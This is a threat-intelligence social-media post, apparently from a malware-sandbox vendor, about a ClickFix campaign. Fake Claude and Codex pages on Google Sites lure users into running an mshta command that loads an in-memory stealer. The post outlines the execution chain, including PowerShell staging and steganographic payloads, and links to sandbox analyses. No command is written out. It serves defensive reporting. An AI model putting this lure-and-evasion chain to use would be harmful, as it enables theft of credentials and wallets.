𝗙𝗮𝗸𝗲 𝗖𝗹𝗮𝘂𝗱𝗲 & 𝗖𝗼𝗱𝗲𝘅 𝗗𝗲𝗹𝗶𝘃𝗲𝗿 𝗜𝗻-𝗠𝗲𝗺𝗼𝗿𝘆 𝗦𝘁𝗲𝗮𝗹𝗲𝗿: 𝗖𝗹𝗶𝗰𝗸𝗙𝗶𝘅 𝘃𝗶𝗮 𝗚𝗼𝗼𝗴𝗹𝗲 𝗦𝗶𝘁𝗲𝘀️ We’re tracking a #ClickFix campaign that mimics popular AI tools, including Codex and Claude, and abuses trusted Google Sites infrastructure to deliver stealer #malware.With no standalone executable dropped to disk and network activity appearing as legitimate powershell.exe traffic, the attack can significantly reduce visibility during the early stages of compromise.️ Victims are directed to trusted sites[.]google[.]com pages and instructed to execute an mshta command. The attack results in in-memory stealer execution, theft of browser, email, and cryptocurrency wallet data, and outbound communication with attacker-controlled C2 infrastructure, while leaving fewer traditional detection opportunities for SOC teams.Execution chain: Trusted Google Sites lure ️ User-executed mshta command ️ Multi-stage PowerShell delivery ️ Steganographic payload extraction from image ️ Shellcode deployment ️ In-memory execution inside powershell.exe ️ Browser, email & wallet data theft ️ C2 exfiltration Using #ANYRUN Sandbox, investigate the full ClickFix execution chain, validate detection coverage, and observe PowerShell staging, steganographic payload delivery, and credential theft activity. Explore the analysis sessions and collect IOCs: Codex lure: https://app.any.run/tasks/151cfb30-5ef2-4962-a90e-58a59ecc43da/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoservice Claude lure: https://app.any.run/tasks/698e0bd5-01b6-40fe-814c-5c0885cea645/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoservice Track related ClickFix activity in #ANYRUN TI Lookup, identify additional Codex and Claude lures, and uncover related AI-themed ClickFix activity and infrastructure: https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_content=030626&utm_term=linktotilookup#%7B%2522query%2522:%2522url:%255C%2522https:/sites.google.com/*/cdx%255C%2522%2520or%2520url:%255C%2522https:/sites.google.com/*/clau%255C%2522%2522,%2522dateRange%2522:7%7D https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_content=030626&utm_term=linktotilookup#%7B%22query%22:%22ruleName:%5C%22AI-themed%20ClickFix%20phishing%20page%20has%20been%20detected%5C%22%22,%22dateRange%22:14%7D Equip your SOC with stronger phishing detection and contain incidents faster: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoenterprise#cybersecurity #infosec